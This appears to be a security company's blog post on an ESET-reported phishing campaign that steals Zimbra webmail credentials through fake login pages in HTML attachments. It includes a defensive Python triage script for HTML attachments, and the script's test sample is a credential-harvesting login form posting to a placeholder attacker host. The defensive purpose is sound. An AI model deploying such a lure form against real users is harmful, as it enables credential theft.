Users of the Zimbra Collaboration email server have recently found themselves in the crosshairs of a carefully crafted social engineering campaign. The campaign targets users' login credentials, with the longer-term aim of exploiting those credentials in subsequent stages of the operation. Launched in April 2023, the campaign is currently active and appears to focus primarily on small to medium-sized businesses and government agencies. The bulk of the affected entities reportedly are in Poland, Ecuador, Mexico, Italy, and Russia. As yet, cybersecurity researchers have not attributed the campaign to any specific threat actor or group.
A typical pattern of the campaign, as outlined by Viktor Šperka, a researcher at ESET, involves the targeted individual receiving an email with an attached HTML file rigged as a phishing page. The email message often conveys a dire warning about an email server update, imminent account deactivation, or a related issue, trying to pressure the user into clicking the attached file.
These emails cunningly spoof the "from" address, making it appear as though they originate from a Zimbra administrator. This tactic is solely designed to enhance credibility and persuade the recipients to open the rigged attachment. The HTML file hides a Zimbra login page specifically customised to mimic the targeted organization. To make it appear more authentic, the username field comes filled in advance with the victim's email address.
Once unsuspecting users enter their credentials into the HTML form, the credentials are captured and sent via an HTTPS POST request to a server controlled by the attackers. What sets this campaign apart, however, is its potential for self-propagation. Successive waves of follow-up phishing appear to have been sent from the accounts of legitimate businesses that fell victim to the initial wave, suggesting that the attacker used compromised administrator accounts at those victims to target further potential victims.
Šperka suggested, “One reason might be that the attacker is banking on password reuse by the administrator targeted through phishing.” This means the same credentials were used for both email and administration, making it easier for the attacker.
In technical terms, the campaign is not sophisticated. It does, however, exploit the fact that an HTML attachment consists of otherwise legitimate code; the only sign of something amiss is the link to the malicious host embedded in the source. Šperka further explained, "This makes it far simpler to bypass reputation-based anti-spam policies, in comparison with phishing techniques that place a malicious link directly in the body of the email."
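The detection opportunity the article points at is that the lure's only tell is an external host in the attachment's markup: a login form whose action posts somewhere other than the organisation's own webmail server, typically with the username already filled in. The following Python script is an added example written for this post (it is not ESET's, Zimbra's, or the campaign's code) showing how a mail gateway or triage analyst could inspect an HTML attachment for exactly those traits. The trusted host `mail.example.org`, the organisation domain `example.org`, the attacker host `attacker.invalid` and both sample attachments are constructed placeholders.

```python
"""Triage HTML e-mail attachments for credential-harvesting login forms.

Added example, not code from the original article or from ESET/Zimbra.
Assumptions (placeholders): the organisation's mail domain is example.org
and its legitimate webmail host is mail.example.org.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organisation legitimately posts credentials to (assumed).
TRUSTED_HOSTS = {"mail.example.org"}
ORG_DOMAIN = "example.org"


class FormInspector(HTMLParser):
    """Collect form actions, pre-filled text inputs, and every host referenced."""

    def __init__(self):
        super().__init__()
        self.form_actions = []       # [action URL, form contains a password field]
        self.prefilled = []          # (input name, value) for pre-filled text/email fields
        self.external_hosts = set()  # hosts seen in src / href / action attributes
        self._in_form = None         # index into form_actions while inside <form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append([a.get("action", ""), False])
            self._in_form = len(self.form_actions) - 1
            self._note_host(a.get("action"))
        elif tag == "input" and self._in_form is not None:
            itype = (a.get("type") or "text").lower()
            if itype == "password":
                self.form_actions[self._in_form][1] = True
            elif itype in ("text", "email") and a.get("value"):
                self.prefilled.append((a.get("name", ""), a["value"]))
        for key in ("src", "href"):
            if key in a:
                self._note_host(a[key])

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = None

    def _note_host(self, url):
        host = urlparse(url or "").hostname
        if host:
            self.external_hosts.add(host.lower())


def triage_attachment(html: str) -> dict:
    """Return the findings that make an HTML attachment look like a credential lure."""
    parser = FormInspector()
    parser.feed(html)
    findings = []
    for action, has_password in parser.form_actions:
        host = urlparse(action).hostname
        # A password form that submits to a host we do not own is the key tell.
        if has_password and host and host.lower() not in TRUSTED_HOSTS:
            findings.append(f"password form posts to untrusted host {host}")
    for name, value in parser.prefilled:
        # The lure pre-fills the victim's address to look authentic.
        if value.lower().endswith("@" + ORG_DOMAIN):
            findings.append(f"field '{name}' pre-filled with org address {value}")
    untrusted = sorted(parser.external_hosts - TRUSTED_HOSTS)
    return {"suspicious": bool(findings), "findings": findings, "untrusted_hosts": untrusted}


# Constructed sample resembling the lure described above: real-looking logo
# from the organisation's own server, form action pointing at the attacker.
SAMPLE_LURE = """<html><body>
<img src="https://mail.example.org/skins/zimbra/logo.png">
<form method="POST" action="https://attacker.invalid/collect.php">
  <input type="text" name="username" value="jane.doe@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form></body></html>"""

# Constructed benign attachment: same shape, but posts to the trusted host.
SAMPLE_BENIGN = """<html><body>
<form method="POST" action="https://mail.example.org/">
  <input type="text" name="username">
  <input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    for label, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, triage_attachment(doc))
```

Because the parser works on the attachment's source rather than on a rendered page, it can run at the gateway before delivery; the two checks it makes, an untrusted form action and a pre-filled organisation address, are the same two traits the article describes, so a hit on either is worth quarantining the message for review.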
At Darksteel Technologies, we are an Orlando based business that can handle all aspects of your IT security. Providing compliance, training, malware protection, cloud security, devsecops, vulnerability management, penetration testing, architecture design and any other information security requirement your business needs. We focus on your cybersecurity so you don't have to.